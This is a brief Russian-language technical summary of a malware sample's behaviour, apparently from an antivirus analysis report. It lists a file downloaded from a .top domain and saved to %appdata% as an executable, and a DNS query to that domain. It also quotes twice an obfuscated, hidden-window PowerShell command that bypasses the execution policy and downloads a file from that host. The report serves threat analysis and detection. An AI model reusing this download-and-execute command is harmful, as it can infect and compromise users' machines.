Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^WerS^hE^Ll^.exe ^-^exEc^utiO^nPOlic^Y^ ^b^yp^aSs -nOprO^FIle -w^Ind^OWstyLe ^hi^D^de^n (n^Ew-Ob^Ject^ sy^sT^em^.nEt.w^e^BC^LIeNt)^.^d^o^w^N^lOaDfILe^('http://www.fopeioaas.to...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "Po^WerS^hE^Ll^.exe ^-^exEc^utiO^nPOlic^Y^ ^b^yp^aSs -nOprO^FIle -w^Ind^OWstyLe ^hi^D^de^n (n^Ew-Ob^Ject^ sy^sT^em^.nEt.w^e^BC^LIeNt)^.^d^o^w^N^lOaDfILe^('http://www.fopeioaas.to...' (со скрытым окном)